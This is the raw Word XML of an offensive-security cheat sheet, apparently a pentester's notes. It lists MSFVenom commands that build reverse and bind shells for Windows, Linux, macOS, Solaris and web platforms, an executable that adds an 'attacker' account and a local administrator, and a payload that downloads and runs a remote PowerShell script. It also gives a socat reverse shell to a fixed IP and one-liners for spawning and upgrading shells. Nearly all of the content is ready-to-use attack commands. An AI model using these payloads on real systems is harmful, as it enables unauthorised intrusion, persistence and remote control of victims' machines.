        <w:pStyle w:val="max-w-3x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50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https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16299B32" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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51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https://www.hackingarticles.in/koadic-com-command-control-framework/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55338941" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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52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https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35257661" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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hyperlink r:id="rId53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https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C81E39" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435E7890" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1D1E4E" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8D2839" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1468F988" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7391DB" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E94437" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3380CA" w14:textId="051A1663" w:rsidR="004816D2" w:rsidRPr="00827D6A" w:rsidRDefault="004816D2" w:rsidP="004816D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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MSFVenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>CheatSheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7452229D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 xml:space="preserve">Basic </w:t>
      </w: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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E06C8AA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 xml:space="preserve"> -p &lt;PAYLOAD&gt; -e &lt;ENCODER&gt; -f &lt;FORMAT&gt; -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 xml:space="preserve"> &lt;ENCODE COUNT&gt; LHOST=&lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CDD54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One can also use the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-a</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the architecture or the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--</w:t>
      </w:r>
      <w:proofErr w:type="gram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platform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60D3A280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Listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DF12D" w14:textId="5CB53902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BEA1BA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-l payloads #Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F34648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-l encoders #Encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801A772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 xml:space="preserve">Common params when creating a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5281ABC9" w14:textId="03C5E37C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3A8230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-b "\x00\x0a\x0d" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454715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-f c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C565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-e x86/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shikata_ga_nai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5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8414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EXITFUNC=thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C670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PrependSetuid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=True #Use this to create a shellcode that will execute something with SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55196084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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49989439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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B3A9A" w14:textId="03BD250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B84155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IP Address) LPORT=(Your Port) -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15346E86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Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780C726" w14:textId="2DFC9DD4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264C6A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bind_tcp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IP Address) LPORT=(Your Port) -f exe &gt; bind.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F270529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Create User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDCAB8" w14:textId="53EFBE15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15699A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adduser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USER=attacker PASS=attacker@123 -f exe &gt; adduser.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250BCD0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CMD Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E682CAF" w14:textId="76C3AFDA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872D7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windows/shell/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IP Address) LPORT=(Your Port) -f exe &gt; prompt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7EA66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Execute Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D181F6D" w14:textId="089C7B72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17A604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-a x86 --platform Windows -p windows/exec CMD="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powershell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\"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IEX(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New-Object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Net.webClient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).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downloadString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('http://IP/nishang.ps1')\"" -f exe &gt; pay.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD63A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-a x86 --platform Windows -p windows/exec CMD="net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localgroup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administrators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shaun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/add" -f exe &gt; pay.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874FD45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Encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2526B8" w14:textId="711403B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B4B34F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shikata_ga_nai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3 -f exe &gt; encoded.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CA714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 xml:space="preserve">Embedded inside </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44E26396" w14:textId="3C7C820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C13499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shell_reverse_tcp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LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -x 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usr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/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBB086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Linux Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFF021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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9BE798" w14:textId="5F5719DC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410A89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linux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/x86/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IP Address) LPORT=(Your Port) -f elf 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reverse.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E211BD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linux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/x64/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shell_reverse_tcp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LHOST=IP LPORT=PORT -f elf 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shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07362FFF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Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DC0D4C" w14:textId="1AF6D29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F6F74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linux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/x86/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bind_tcp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IP Address) LPORT=(Your Port) -f elf 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bind.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45790A07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SunOS (Solaris)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8280F7" w14:textId="792DE0D1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C9A561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--platform=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solaris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--payload=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solaris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/x86/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shell_reverse_tcp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ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/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shikata_ga_nai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-b '\x00' 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solshell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27E508A5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MAC Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18897171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Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1CB2C" w14:textId="30385F1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A6C4FF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osx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/x86/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shell_reverse_tcp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IP Address) LPORT=(Your Port) -f macho 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reverse.macho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5845AA99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Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE9BEF" w14:textId="61C012BD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CA0C5F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osx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/x86/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shell_bind_tcp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IP Address) LPORT=(Your Port) -f macho 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bind.macho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1ED759AB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Web Based Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697ACCB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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CCC003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Reverse shel</w:t>
      </w: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l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF0BE2" w14:textId="1601E122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DA799F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php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meterpreter_reverse_tcp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LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw 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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71C99F45" w14:textId="1FFFABCF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">cat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shell.php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|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pb</w:t>
      </w:r>
      <w:r w:rsidR="004701D4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&amp;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&amp; echo '&lt;?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php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' | tr -d '\n' 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shell.php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&amp;&amp;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pbpaste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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EF00969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ASP/x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5D7FD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Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BCC65" w14:textId="6F15455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EBCFD1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IP Address) LPORT=(Your Port) -f asp &gt;reverse.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346DA6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windows/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meterpreter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IP Address) LPORT=(Your Port) -f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aspx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&gt;reverse.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035D3AC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JSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C064C0C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Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A024AD" w14:textId="38EE79B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ABE32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java/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jsp_shell_reverse_tcp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IP Address) LPORT=(Your Port) -f raw&gt;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reverse.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="773634FE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WAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759BEEB4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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A216819" w14:textId="5189DB7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EA378E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java/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jsp_shell_reverse_tcp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IP Address) LPORT=(Your Port) -f war &gt;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reverse.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1061E61A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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>NodeJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C51F22" w14:textId="2D4478F9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3480AD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nodejs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shell_reverse_tcp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IP Address) LPORT=(Your Port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD5538B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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Script Language payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2C920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Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A8AFE" w14:textId="0A80B678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1531F3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unix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reverse_perl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IP Address) LPORT=(Your Port) -f raw &gt; reverse.pl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1853A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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0F2C3" w14:textId="15B279A6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F2E03DF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unix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reverse_python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=(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IP Address) LPORT=(Your Port) -f raw &gt; reverse.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33576478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Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB61CFF" w14:textId="21AB74B7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7832E7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msfvenom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cmd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unix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reverse_bash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LHOST=&lt;Local IP Address&gt; LPORT=&lt;Local Port&gt; -f raw &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33B7A3" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="0C69354C" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="7E297C50" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="5B758BD8" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="01794CEE" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A"/>
    <w:p w14:paraId="41E0A5D1" w14:textId="77777777" w:rsidR="004816D2" w:rsidRPr="00827D6A" w:rsidRDefault="00000000" w:rsidP="004816D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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="004816D2" w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>Full TTYs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CFE0459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Full TTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F99BDA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Note that the shell you set in the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SHELL</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable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must</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> be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listed inside</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>/etc/shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="gram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The</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> value for the SHELL variable was not found in the /etc/shells file This incident has been reported</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. Also, note that the next snippets only work in bash. If you're in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>zsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, change to a bash before obtaining the shell by running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bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDCEC04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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57058F" w14:textId="7FDFC5CF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87D09F5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python3 -c 'import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pty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; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pty.spawn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("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3A8A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19A3F2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(inside the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session)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CTRL+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Z;stty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raw -echo;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fg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; ls; export SHELL=/bin/bash; export TERM=screen;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stty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rows 38 columns 116; reset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15747F67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You can get the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number</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of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rows</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> executing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31483E8E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script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B948C0A" w14:textId="1620A004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CCD318A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script /dev/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null -qc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/bin/bash #/dev/null is to not store anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F24B7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(inside the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nc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session)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CTRL+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Z;stty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raw -echo;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fg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; ls; export SHELL=/bin/bash; export TERM=screen;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stty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rows 38 columns 116; reset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4845968E" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A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socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30AD9157" w14:textId="40A87A0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DAD8296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#Listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54776F03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file:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tty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`,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raw,echo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=0 tcp-listen:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA9A9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373A285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#Victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29768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socat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exec:'bash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-li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',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pty</w:t>
      </w:r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,stderr,setsid,sigint,sane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tcp:10.0.3.4:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB40CDA" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-3"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Spawn shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785DE6CD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 xml:space="preserve">python -c 'import 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pty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 xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("/bin/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")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C3DFC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 xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('/bin/bash')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492BB98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/bin/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 xml:space="preserve"> -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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C33A842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script -qc /bin/bash /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CAD75A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perl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 xml:space="preserve"> -e 'exec "/bin/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";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B45669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spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: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exec "/bin/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5563D542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ruby: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exec "/bin/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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F91A04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spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>lua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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os.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('/bin/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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6811DF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IRB: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exec "/bin/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sh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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82931F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>vi</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: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:!bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F52D086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>vi</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: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:set</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> shell=/bin/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bash:shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77166A5C" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: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!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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
